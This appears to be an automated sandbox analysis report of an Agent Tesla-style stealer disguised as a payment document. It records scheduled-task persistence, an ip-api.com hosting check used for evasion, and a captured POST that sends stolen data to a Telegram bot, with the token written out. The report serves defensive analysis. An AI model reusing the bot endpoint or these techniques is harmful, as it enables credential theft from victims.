                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                  Process:C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1572
                                                                                                                  Entropy (8bit):5.1171936231131365
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTAv
                                                                                                                  MD5:80A85739E1CD45F1F854EF66BAD3CE81
                                                                                                                  SHA1:CA663350F89D88700B0A7D520C89347C095DDE30
                                                                                                                  SHA-256:E341FF8A573EEAFCFA15A44FB7FCC7461B67945FD00AAEB06A5DB25C903175A6
                                                                                                                  SHA-512:E1A900C45AABC9F1C8395727194AE4FD8D9E5DED1A91C87713DF8E537FF02CC860B0D9D16AABC1401F3637D76BA1B76E367170A6D4048FA7590094CC190FF7EB
                                                                                                                  Malicious:false
                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                  Process:C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):776200
                                                                                                                  Entropy (8bit):7.9363230894425545
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:grOY+Ri3AgFdh1QW4s+HCBhKBSh4/wFgfyYVWmTr6bzoAlHJ35mkR:pQ3Ag/QzsjBgBShKagfJVtv63oArD
                                                                                                                  MD5:F3C67CD1BBB9C8A8BCB56EE97C5A7B27
                                                                                                                  SHA1:AD3397267ADA55BCA8D547DBB93BC79F40D138CF
                                                                                                                  SHA-256:A36C66FB7FDFB2639CC0CCDEAEEF4E6C1A1CD103BA76309ED32777B3F2AB069D
                                                                                                                  SHA-512:6BD165450A9007CE4E90A120455BB9FF5914E423E99266CDC854B91AAEA9376C3D54F78AB2EE034597AC90DE74462F9E9E8B74B598E3D5C3B5EDB834DF0F757E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T=g..............0...... .......... ........@.. ....................................`.....................................O.......|................6........................................................... ............... ..H............text........ ...................... ..`.rsrc...|...........................@..@.reloc..............................@..B.......................H........6...(...........^...@............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                                                                  Process:C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):7.9363230894425545
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  File name:Wire slip account payable.pif.exe
                                                                                                                  File size:776'200 bytes
                                                                                                                  MD5:f3c67cd1bbb9c8a8bcb56ee97c5a7b27
                                                                                                                  SHA1:ad3397267ada55bca8d547dbb93bc79f40d138cf
                                                                                                                  SHA256:a36c66fb7fdfb2639cc0ccdeaeef4e6c1a1cd103ba76309ed32777b3f2ab069d
                                                                                                                  SHA512:6bd165450a9007ce4e90a120455bb9ff5914e423e99266cdc854b91aaea9376c3d54f78ab2ee034597ac90de74462f9e9e8b74b598e3d5c3b5edb834df0f757e
                                                                                                                  SSDEEP:12288:grOY+Ri3AgFdh1QW4s+HCBhKBSh4/wFgfyYVWmTr6bzoAlHJ35mkR:pQ3Ag/QzsjBgBShKagfJVtv63oArD
                                                                                                                  TLSH:8DF423A1BE84AB02EB3DA771559F57858B30B922AE2CC0BE445C49D53FD3BD488C119F
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T=g..............0...... ........... ........@.. ....................................`................................
                                                                                                                  Icon Hash:8bdb4b414d656d61
                                                                                                                  Entrypoint:0x4b9fee
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x673D54D7 [Wed Nov 20 03:17:43 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                  Error Number:-2146869232
                                                                                                                  Not Before, Not After
                                                                                                                  • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                                                  Subject Chain
                                                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add al, 00h
                                                                                                                  add eax, dword ptr [eax]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  xor byte ptr [eax], al
                                                                                                                  add byte ptr [eax+0000000Eh], al
                                                                                                                  pushad
                                                                                                                  add byte ptr [eax], al
                                                                                                                  adc byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  nop
                                                                                                                  add byte ptr [eax], al
                                                                                                                  sbb byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  rol byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add dword ptr [eax], eax
                                                                                                                  add dword ptr [eax], eax
                                                                                                                  add byte ptr [eax], al
                                                                                                                  dec eax
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], 00000000h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add dword ptr [eax], eax
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  lock add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [ecx], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  jnle 00007F74450587E2h
                                                                                                                  add byte ptr [eax+00h], bh
                                                                                                                  add byte ptr [eax+00000000h], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add dword ptr [eax], eax
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  xor al, 18h
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add dword ptr [eax], eax
                                                                                                                  add dword ptr [eax], eax
                                                                                                                  add byte ptr [eax], al
                                                                                                                  test al, 00h
                                                                                                                  add byte ptr [eax+00000000h], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb9f9c0x4f.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xba0000x1d7c.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xba2000x3608
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x20000xb7ff40xb800097662e2ca187541fbf3dd817bdd05007False0.9599184782608695data7.942591197199076IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0xba0000x1d7c0x1e00e31fdd7674a9227c9d1516a4952ca806False0.80625data7.3216214464774225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0xbc0000xc0x200cf6b6b2e920400c1427579ad96daa38cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0xba1000x1733PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9151372284896447
                                                                                                                  RT_GROUP_ICON0xbb8440x14data1.05
                                                                                                                  RT_VERSION0xbb8680x314data0.434010152284264
                                                                                                                  RT_MANIFEST0xbbb8c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-11-21T11:02:11.422015+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449737149.154.167.220443TCP
                                                                                                                  2024-11-21T11:02:11.422015+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449737149.154.167.220443TCP
                                                                                                                  2024-11-21T11:02:11.743222+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449737TCP
                                                                                                                  2024-11-21T11:02:13.971032+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449740149.154.167.220443TCP
                                                                                                                  2024-11-21T11:02:14.259420+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449740TCP
                                                                                                                  2024-11-21T11:02:14.684700+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.449741149.154.167.220443TCP
                                                                                                                  2024-11-21T11:02:14.684700+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449741149.154.167.220443TCP
                                                                                                                  2024-11-21T11:02:14.976060+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449741TCP
                                                                                                                  2024-11-21T11:02:17.101071+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.449742149.154.167.220443TCP
                                                                                                                  2024-11-21T11:02:17.435516+01002854281ETPRO MALWARE Win32/Agent Tesla CnC Response Inbound1149.154.167.220443192.168.2.449742TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Nov 21, 2024 11:02:06.745538950 CET4973580192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:06.865210056 CET8049735208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:06.865330935 CET4973580192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:06.866050005 CET4973580192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:06.985626936 CET8049735208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:08.058590889 CET8049735208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:08.164324999 CET4973580192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:09.315159082 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:09.315222979 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:09.315346003 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:09.372230053 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:09.372272015 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:10.777621031 CET4973980192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:10.791990995 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:10.792064905 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:10.795469999 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:10.795492887 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:10.795938015 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:10.897614002 CET8049739208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:10.897722006 CET4973980192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:10.897968054 CET4973980192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:10.899050951 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:10.943339109 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.017520905 CET8049739208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.247750998 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:11.247792006 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.422024965 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.481995106 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:11.742743969 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.743110895 CET44349737149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.743179083 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:11.763664007 CET49737443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:11.854248047 CET4973580192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:11.854612112 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:11.854675055 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.854762077 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:11.855156898 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:11.855175018 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.974420071 CET8049735208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:11.974630117 CET4973580192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:11.993930101 CET8049739208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:12.044502974 CET4973980192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:12.691004992 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:12.691062927 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:12.691168070 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:12.694936991 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:12.694951057 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:13.310165882 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:13.311726093 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:13.311784029 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:13.669595003 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:13.669644117 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:13.971039057 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.013271093 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.057862997 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.057935953 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.061353922 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.061361074 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.061619043 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.106998920 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.160310984 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.207336903 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.259047985 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.259285927 CET44349740149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.259356022 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.259746075 CET49740443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.513396978 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.513430119 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.684706926 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.731995106 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.975847006 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.975943089 CET44349741149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:14.976075888 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:14.976516962 CET49741443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:15.013113976 CET4973980192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:15.014153957 CET49742443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:15.014271975 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:15.014499903 CET49742443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:15.014743090 CET49742443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:15.014781952 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:15.133054018 CET8049739208.95.112.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:15.133147955 CET4973980192.168.2.4208.95.112.1
                                                                                                                  Nov 21, 2024 11:02:16.424757957 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:16.430874109 CET49742443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:16.430900097 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:16.779340029 CET49742443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:16.779371023 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:17.101075888 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:17.153877974 CET49742443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:17.435324907 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:17.435405970 CET44349742149.154.167.220192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:17.435486078 CET49742443192.168.2.4149.154.167.220
                                                                                                                  Nov 21, 2024 11:02:17.435868979 CET49742443192.168.2.4149.154.167.220
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Nov 21, 2024 11:02:06.501912117 CET5793753192.168.2.41.1.1.1
                                                                                                                  Nov 21, 2024 11:02:06.728482008 CET53579371.1.1.1192.168.2.4
                                                                                                                  Nov 21, 2024 11:02:09.088274956 CET6154853192.168.2.41.1.1.1
                                                                                                                  Nov 21, 2024 11:02:09.314172983 CET53615481.1.1.1192.168.2.4
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Nov 21, 2024 11:02:06.501912117 CET192.168.2.41.1.1.10xc8a4Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                  Nov 21, 2024 11:02:09.088274956 CET192.168.2.41.1.1.10x10cdStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Nov 21, 2024 11:02:06.728482008 CET1.1.1.1192.168.2.40xc8a4No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                  Nov 21, 2024 11:02:09.314172983 CET1.1.1.1192.168.2.40x10cdNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                  • api.telegram.org
                                                                                                                  • ip-api.com
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449735208.95.112.1807432C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 21, 2024 11:02:06.866050005 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                  Host: ip-api.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Nov 21, 2024 11:02:08.058590889 CET175INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 21 Nov 2024 10:02:07 GMT
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 6
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  X-Ttl: 60
                                                                                                                  X-Rl: 44
                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                  Data Ascii: false


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449739208.95.112.1807856C:\Users\user\AppData\Roaming\EQVRGq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 21, 2024 11:02:10.897968054 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                  Host: ip-api.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Nov 21, 2024 11:02:11.993930101 CET175INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 21 Nov 2024 10:02:11 GMT
                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                  Content-Length: 6
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  X-Ttl: 56
                                                                                                                  X-Rl: 43
                                                                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                                                                  Data Ascii: false


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449737149.154.167.2204437432C:\Users\user\Desktop\Wire slip account payable.pif.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-21 10:02:10 UTC260OUTPOST /bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument HTTP/1.1
                                                                                                                  Content-Type: multipart/form-data; boundary=---------------------------8dd09e9a634aff9
                                                                                                                  Host: api.telegram.org
                                                                                                                  Content-Length: 915
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
